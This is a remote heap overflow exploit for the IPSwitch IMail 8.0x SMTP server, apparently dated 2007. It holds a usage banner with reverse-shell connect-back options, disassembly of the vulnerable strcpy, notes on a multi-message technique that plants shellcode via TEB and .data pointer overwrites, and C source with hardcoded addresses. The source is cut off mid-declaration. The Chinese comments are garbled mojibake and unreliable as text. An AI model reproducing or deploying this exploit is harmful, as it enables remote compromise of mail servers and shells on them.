IPSwitch IMail Server 8.0x Remote Heap Overflow Exploit

/* by axis 2007-06-05 http://www.ph4nt0m.org Mail-List: http://list.ph4nt0m.org 脪脭脟掳脫脨脮芒啪枚脪禄啪枚imail碌脛exp PRIVATE Remote Exploit For IMAIL Smtp Server(1.2) This is For imail 8.01-8.11 version Usage:faint.exe -d <host> [options] Options: -d: Hostname to attack [Required] -t: Type [Default: 0] -p: Attack port [Default: 25] -S: the IP connect back to. -P: the port connect back to. Types: 0: win2k All version , IMail 8.01-11 虏禄脰陋碌脌脢脟脛脛脦禄沤贸脜拢脨沤碌脛 脳卯艙眉驴沤脕脣驴沤拢卢 路脟鲁拢潞脙脥忙碌脛脪禄啪枚脗漏露沤隆拢 脗漏露沤脢脟路垄脡煤脭脷iaspam.dll脌茂 loc_1001ada5 ==> 脳垄脪芒露炉脤卢碌梅脢脭脢卤潞貌脳垄脪芒艗脫脭脴禄霉脰路碌脛虏禄脥卢隆拢 mov eax, [ebp+var_54] mov ecx, [eax+10c8h] push ecx ; char * mov edx, [ebp+var_54] mov eax, [edx+10d0h] push eax ; char * call _strcpy add esp, 8 jmp loc_1001a6f0 脮芒脌茂strcpy碌脛脕艙啪枚buffer拢卢src潞脥dst碌脛脰啪脮毛拢卢鸥脫脠禄脢脟脰卤艙脫沤脫露脩脌茂露脕鲁枚脌沤碌脛隆拢 露酶脰庐脟掳脙禄脫脨脳枚脠脦潞脦艗矛虏茅 脣霉脪脭路垄脣脥啪枚脫脢艗镁碌艙路镁脦帽脝梅拢卢SMD脦脛艗镁 脠禄潞贸脭脷脝盲潞贸碌脛脝芦脪脝沤艩驴脴脰脝脮芒脕艙啪枚碌脴脰路拢卢鸥脥驴脡脪脭驴艙卤沤脠脦脪芒脳脰路没沤庐碌艙脠脦脪芒脛脷沤忙隆拢 badchar脢脟 0x00 0x0a emm脣碌禄鹿脫脨啪枚 0x25,虏禄鹿媒脦脪脙禄脮脪碌艙隆拢 脪脭脟掳脥酶脡脧脛脟啪枚路沤脕卢碌脛掳忙卤鸥拢卢脢脟脌没脫脙脕脣啪虏啪脟peb脌茂碌脛脰啪脮毛隆拢 脮芒脰脰路艙路拧脭脷2003脡脧虏禄脛脺脫脙隆拢 脮芒脌茂脦脪虏脡脫脙脕脣emm碌脛路艙路拧拢卢鹿鹿脭矛脕脣脪禄啪枚脪莽鲁枚 脪貌脦陋imailsec.dll碌脛.data露脦驴脡脨沤隆拢 脣霉脪脭脦脪脮脪碌艙脕脣脮芒脙沤脪禄啪枚碌脴路艙 1000CB5D 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 1000CB60 50 PUSH EAX 1000CB61 8B0D 6C540310 MOV ECX,DWORD PTR DS:[1003546C] ; IMailsec.1003549C 1000CB67 51 PUSH ECX 1000CB68 8D95 FCFDFFFF LEA EDX,DWORD PTR SS:[EBP-204] 1000CB6E 52 PUSH EDX 1000CB6F FF15 F8D30210 CALL DWORD PTR DS:[<&USER32.wsprintfA>] ; USER32.wsprintfA 脝盲脰脨脰啪脮毛DWORD PTR DS:[1003546C] 脭脷imailsec.dll碌脛.data脰脨拢卢脮芒啪枚碌脴脰路驴脡脪脭卤禄脦脪脙脟啪虏啪脟隆拢 脣霉脪脭脦脪脙脟鸥脥驴脡脪脭鹿鹿脭矛脪禄啪枚脪莽鲁枚隆拢 脣艗脗路脠莽脧脗拢潞 碌脷脪禄路芒脫脢艗镁拢潞 路垄脣脥shellcode碌艙脛脷沤忙脰脨卤拢沤忙潞脙隆拢脮芒脌茂脦脪路脜碌艙脕脣teb脰脨 碌脷露镁路芒脫脢艗镁拢潞 路垄脣脥脪莽鲁枚脨猫脪陋碌脛啪虏啪脟脳脰路没沤庐碌艙脛脷沤忙脰脨卤拢沤忙潞脙隆拢脮芒脌茂脦脪脪虏路脜脭脷脕脣teb脰脨 碌脷脠媒路芒脫脢艗镁拢潞 啪虏啪脟imailsec.dll脰脨碌脛 .data露脦碌脛脰啪脮毛拢卢脢鹿wsprintfA脭矛鲁脡脪莽鲁枚 脪莽鲁枚啪虏啪脟脢鹿脫脙碌脛脳脰路没沤庐脢脟碌脷露镁路芒脫脢艗镁路垄脣脥鹿媒脠楼碌脛拢卢啪虏啪脟潞贸碌脛路碌禄脴碌脴脰路脰卤艙脫脰啪脧貌脕脣碌脷脪禄路芒脫脢艗镁路垄脣脥鹿媒脠楼碌脛shellcode脭脷脛脷沤忙脰脨碌脛碌脴脰路隆拢 脣霉脪脭脮芒啪枚脗漏露沤脢脟潞脥脝艙脤拧脦脼鹿脴碌脛拢隆拢隆虏禄脨猫脪陋脠脦潞脦opcode拢隆拢隆 脭脷脢碌艗脢脌没脫脙脢卤脦脪路垄脣脥脕脣4路芒脫脢艗镁拢卢碌脷脪禄路芒脢脟路脧脫脢艗镁拢卢脫脙脫脷脤谩啪脽鲁脡鹿艩脗脢隆拢 脫脡脫脷禄楼脕陋脥酶碌脛spam路潞脌脛拢卢脣霉脪脭碌脠碌艙脫脢艗镁路镁脦帽脝梅沤艩脌铆脗漏露沤脫脢艗镁脢卤拢卢脪虏脨铆脪脩鸥颅鹿媒脕脣艗啪啪枚脭脗脕脣隆拢隆拢隆拢 脣霉脪脭脳卯潞脙碌脛路艙掳啪脢脟脢鹿脫脙download+exec 碌脛shellcode隆拢 脮芒脌茂啪酶鲁枚脪禄啪枚卤脠艙脧脌脙碌脛路沤脕卢shellcode脳梅脦陋poc隆拢 鸥脻emm脣碌脮芒啪枚脗漏露沤脪禄脰卤脙禄虏鹿拢卢脰禄脢脟啪脽掳忙卤鸥脙禄脫脨脕脣隆拢隆拢隆拢 */ #include <stdio.h> #include <stdlib.h> #include <windows.h> #include <winsock.h> #include <io.h> #pragma comment (lib,"ws2_32") char *szEHLO = "HELO "; char *szMF = "MAIL FROM <fucker@fuckimail.org> "; char *szRCPT = "RCPT TO: <postmaster> "; char *szDATA = "DATA "; char *szTIME = "Date: Thu, 1 Oct 2007 07:06:09 +0800 "; char *szMIME = "MIME "; char *szEND = ". "; char *szQUIT = "QUIT "; char *szCT = "Content-Type: multipart/boundary="; char *szCTE = "Content-Transfer-Encoding:"; //#define SCaddr "x50xe7x03x10" #define SCaddr "x50xc8xfdx7f" #define Fuck_ptr "x6cx54x03x10" //0x1003546c #define Teb_temp1 0x7ffdd050 #define Teb_temp2 0x7ffdd040 #define Teb_temp3 0x7ffdd030 unsigned short port = 25; unsigned char payload[5000] = ""; #define PROC_BEGIN __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 #define PROC_END PROC_BEGIN unsigned char sh_Buff&